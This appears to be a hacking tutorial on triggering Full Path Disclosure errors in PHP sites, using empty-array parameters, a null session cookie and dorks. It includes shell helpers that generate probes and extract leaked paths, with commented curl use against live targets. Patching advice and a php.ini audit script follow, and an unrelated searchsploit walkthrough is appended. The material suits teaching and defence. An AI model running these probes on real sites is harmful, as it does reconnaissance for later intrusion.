Hey everybody. Today we are going to talk about a very common web vulnerability, "Full Path Disclosure".
Overview:=
Full Path Disclosure (FPD) vulnerabilities let an attacker see the internal path structure of an installation, e.g. /home/dir/htdocs/blahblah.
Severity:= Low to Medium
FPD is rated at most medium because on its own it is usually not an exploitable vulnerability; it is an information leak.
It is rarely exploited by itself, but it is a valuable clue when exploiting other web vulnerabilities such as SQL injection with load_file() or LFI, which need the real path on disk.
Reason:=
It is most often caused by a misconfigured web server or PHP installation that shows error messages to website visitors. Sometimes the application itself emits debugging error messages.
How To Generate An FPD Error:=
As said above, FPD is very useful alongside SQL injection with load_file() or LFI: if you have a site vulnerable to one of these but do not know the web root, there is little you can do with it. Once you have the root path you can continue digging.
Below are some well-known, and a few less well-known, methods of generating errors that contain the full path.
1-Empty Array
If a site requests a page through a parameter like this:
Quote:http://site.com/index.php?page=about
we can append empty square brackets to the parameter name. PHP then hands the script an array instead of a string, and the first function that expects a string chokes on it. The request would look like this:
Quote:http://site.com/index.php?page[]=about
This breaks the page and makes it spit out an error, full path included:
Quote:Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Another error of the same kind:
Quote:Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131
2-Null Session Cookie
Another popular and very reliable method of producing an error containing the full path is to give the page an empty session ID. The cookie can be set from the browser's address bar with a javascript: URL:
Code:
javascript:void(document.cookie="PHPSESSID=");
By setting the PHPSESSID cookie to an empty value, session_start() rejects the session ID and we get an error such as:
Quote:Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
(Errors are useful to the site owner, so rather than turning error reporting off altogether it is enough to keep them out of the page output with display_errors; see "How to Patch FPD" below.)
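Both tricks above boil down to the same loop: send a malformed request, then fish the leaked path out of the response. The script below is an added example, not code from the original post: empty_array_probes() rewrites each query parameter as name[]=value, and extract_fpd_paths() pulls the "in /path/file.php on line N" part out of whatever comes back. The target URL and the response body it is run against are constructed (the two warnings quoted above plus a Windows-style one), and the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the original post. Two helpers for the
# "empty array" and "null session cookie" tricks: one builds the probe URLs,
# the other pulls leaked server-side paths out of a response body.
# The URL and the response body below are constructed for illustration.

# Print one probe URL per query parameter, with that parameter rewritten as
# name[]=value so PHP receives an array where the code expects a string.
empty_array_probes() {
    base=${1%%\?*}
    query=${1#*\?}
    [ "$query" = "$1" ] && return 0      # no query string: nothing to mutate
    printf '%s\n' "$query" | awk -F'&' -v base="$base" '{
        for (i = 1; i <= NF; i++) {      # mutate the i-th parameter only
            out = ""
            for (j = 1; j <= NF; j++) {
                pair = $j
                if (j == i) { if (!sub(/=/, "[]=", pair)) pair = pair "[]" }
                out = out (j > 1 ? "&" : "") pair
            }
            print base "?" out
        }
    }'
}

# Read an HTTP response body on stdin and print each distinct path leaked by
# PHP's "... in /path/to/file.php on line N" message. Unix paths and Windows
# drive paths (C:\xampp\htdocs\...) are both matched; sorted in C locale so
# the output order is stable.
extract_fpd_paths() {
    grep -oE ' in ((/[^/ ]+)+|[A-Za-z]:\\[^ ]+) on line [0-9]+' \
        | sed -E 's/^ in //; s/ on line [0-9]+$//' \
        | LC_ALL=C sort -u
}

# Constructed response body: the two warnings quoted in the post plus a
# Windows-style one, as a server with display_errors on would return them.
SAMPLE_BODY=$(printf '%s\n%s\n%s' \
  'Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84' \
  'Warning: session_start() [function.session-start]: The session id contains illegal characters in /home/example/public_html/includes/functions.php on line 2' \
  'Warning: include(Array): failed to open stream: No such file or directory in C:\xampp\htdocs\index.php on line 10')

# Offline demonstration against the constructed data.
empty_array_probes 'http://site.com/index.php?page=about&lang=en'
printf '%s\n' "$SAMPLE_BODY" | extract_fpd_paths

# Against a live target (not run here) the same two helpers chain with curl:
#   curl -s -b 'PHPSESSID=' "$url" | extract_fpd_paths
#   for u in $(empty_array_probes "$url"); do curl -s "$u" | extract_fpd_paths; done
```

The probe helper mutates one parameter at a time on purpose: a page that survives page[]= may still fall over on a different parameter, and changing them one by one tells you which one produced the warning.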
3-Dorks:
We can also use search-engine dorks to find indexed error pages on a specific site:
Warning: * [function.*]: site:yourtargetsitehere
I prefer bing.com for this, especially when I have to search a whole server (by IP) for an error message:
ip:xxx.xxx.xxx.xx sql error
ip:xxx.xxx.xxx.xx fatal error
ip:xxx.xxx.xxx.xx warning:* [function.*]
The creativity of your dorks is up to you.
4-Using SQL Injection load_file()
This is another good possibility; I will cover it in a later tutorial.
How to Patch FPD:=
The fix is to keep error messages out of the page output. The blunt way is to turn error reporting off in the code, so nothing is ever emitted:
PHP Code:
error_reporting(0);
That also blinds you to your own bugs, so the better fix is to leave error_reporting on, switch display_errors off and keep log_errors on, so errors go to a log file instead of to the visitor. Either of these turns the display off:
php.ini
Code:
display_errors = Off
httpd.conf (mod_php)
Code:
php_flag display_errors off
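A check to go with the configuration above, added here as an example rather than taken from the original post: audit_php_ini() parses a php.ini and reports whether display_errors is really off and whether log_errors is on, accepting the spellings PHP does (On/Off, 1/0, true/false, quoted values, trailing ; comments). The two ini fragments are constructed; the directive names are PHP's own.

```shell
#!/bin/sh
# Added example, not from the original post: audit a php.ini for the two
# directives that decide whether PHP errors reach the browser or a log file.
# The ini fragments below are constructed; the directive names are real.

# audit_php_ini <file> : prints one line per directive, tagged OK, FAIL or WARN.
audit_php_ini() {
    awk '
        # Normalise the spellings php.ini accepts: On/1/true/yes, Off/0/false/no/"".
        function norm(v) {
            gsub("^[ \t\"\047]+|[ \t\"\047]+$", "", v)   # trim blanks and quotes
            v = tolower(v)
            if (v == "1" || v == "true" || v == "yes" || v == "on") return "on"
            if (v == "0" || v == "false" || v == "no" || v == "" || v == "off") return "off"
            return v                                    # e.g. "stderr": not off, report as is
        }
        /^[ \t]*;/ { next }                             # comment line
        /^[ \t]*$/ { next }                             # blank line
        /^[ \t]*\[/ { next }                            # [Section] header
        {
            sub(/;.*$/, "")                             # trailing comment
            eq = index($0, "="); if (eq == 0) next
            key = tolower($0); key = substr(key, 1, eq - 1)
            gsub(/^[ \t]+|[ \t]+$/, "", key)
            seen[key] = norm(substr($0, eq + 1))        # last assignment wins
        }
        END {
            # PHP itself defaults display_errors to on, so an unset value is a FAIL too.
            de = ("display_errors" in seen) ? seen["display_errors"] : "unset (PHP default: on)"
            le = ("log_errors" in seen) ? seen["log_errors"] : "unset"
            print (de == "off" ? "OK   display_errors=" : "FAIL display_errors=") de
            print (le == "on"  ? "OK   log_errors="     : "WARN log_errors=") le
        }' "$1"
}

# Constructed weak fragment: warnings go straight into the HTML.
WEAK_INI='; constructed php.ini fragment (weak)
[PHP]
error_reporting = E_ALL
display_errors = On
log_errors = Off'

# Constructed hardened fragment: same reporting level, but logged, never shown.
HARDENED_INI='; constructed php.ini fragment (hardened)
[PHP]
error_reporting = E_ALL
display_errors = Off   ; keep the browser blind
log_errors = On
error_log = /var/log/php_errors.log'

tmp=$(mktemp -d)
printf '%s\n' "$WEAK_INI" > "$tmp/weak.ini"
printf '%s\n' "$HARDENED_INI" > "$tmp/hardened.ini"
audit_php_ini "$tmp/weak.ini"
audit_php_ini "$tmp/hardened.ini"
rm -rf "$tmp"
```

Because php_flag in httpd.conf and ini_set() in application code override php.ini, confirm the effective value in the web SAPI (phpinfo() on a test page) rather than trusting the file alone; `php -i` only tells you what the CLI sees.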
Tools:=
https://code.google.com/p/inspathx/
How To Search For Exploits Using the Exploit-DB Search in BackTrack - Terminal
In hacking we usually look for exploits to own the target, and today I'm going to show you how to look for exploits in BackTrack from inside your terminal!
What many of us don't know is that there are more than 15,000 exploits inside your BackTrack install, written in Perl, Ruby, Python and more. Today we'll learn how to search those exploits easily, and faster than Googling!
When I use Linux I like to use the terminal for almost everything, and now we will use it for exploit searching.
Let's start.
First of all, open your terminal and type this command:
cd /pentest/exploits/exploitdb
As you can see, there are two files and a directory in the directory we just entered. For now let's focus on the "searchsploit" file.
We will use this file to find the exploits on our PC, here is how to use it:
./searchsploit term1 term2 term3
By "term" I mean a word that describes the exploit you're looking for, something that narrows the results down to only what you want.
For example, if you want a DoS exploit for Java on Windows, the command should look like this:
./searchsploit windows java dos
That .csv file contains the names and paths of all the exploits; searchsploit searches it for your terms and shows the matching rows.
Easy, right?
Now change the terms to find the exploit you want.
OK, so we get the exploit description and a path...
As I mentioned, there are two files and one directory. Now we know what the two files do; it's the directory's turn.
It contains the exploits themselves, at the paths searchsploit shows, so just enter it and copy the path to get the file.
Let me show you an example.
We used the command:
./searchsploit windows java dos
and got some paths. To get to an exploit, add "platforms" to the beginning of the path. For example, we got:
/windows/dos/11670.py
To read it, use:
cat platforms/windows/dos/11670.py
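To make explicit what searchsploit is doing with that .csv file, here is an added example (not from the original post and not the exploit-db project's own script) that performs the same lookup in a few lines of POSIX sh: every term must appear somewhere in the row, matching is case-insensitive, and the path column becomes platforms/<path> on disk. The CSV layout (id,path,description) and the three rows are constructed for illustration; /windows/dos/11670.py is the only path taken from the post.

```shell
#!/bin/sh
# Added example, not part of the original post: a minimal stand-in for the
# searchsploit lookup, written out so its matching rule (all terms, any
# order, case-insensitive) and path resolution (platforms/<path>) are visible.
# CSV layout and rows are constructed; descriptions avoid commas so a plain
# comma split is enough here.

# search_exploits <csv> term... : print "description | platforms<path>" for
# every row containing all of the terms.
search_exploits() {
    csv=$1; shift
    awk -F',' -v terms="$*" '
        BEGIN { n = split(tolower(terms), t, " ") }
        {
            row = tolower($0)
            for (i = 1; i <= n; i++) if (index(row, t[i]) == 0) next
            print $3 " | platforms" $2
        }' "$csv"
}

# exploit_file <archive_dir> <path from search> : where the exploit lives on disk.
exploit_file() {
    printf '%s/platforms%s\n' "$1" "$2"
}

# Constructed stand-in for the archive .csv (id,path,description).
SAMPLE_CSV='1,/windows/dos/11670.py,Java - Denial of Service (Windows) [constructed row]
2,/windows/remote/2.c,Java - Remote Code Execution (Windows) [constructed row]
3,/linux/dos/3.py,Java - Denial of Service (Linux) [constructed row]'

tmpdir=$(mktemp -d)
printf '%s\n' "$SAMPLE_CSV" > "$tmpdir/files.csv"
search_exploits "$tmpdir/files.csv" windows java dos
exploit_file /pentest/exploits/exploitdb /windows/dos/11670.py
rm -rf "$tmpdir"
```

Note that the terms are substring matches over the whole row, path included: "dos" is satisfied by the /dos/ directory in the path as much as by the description, which is why the Linux row above is excluded only by the missing "windows".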
That's it you guys =)
Have fun, and happy pentesting!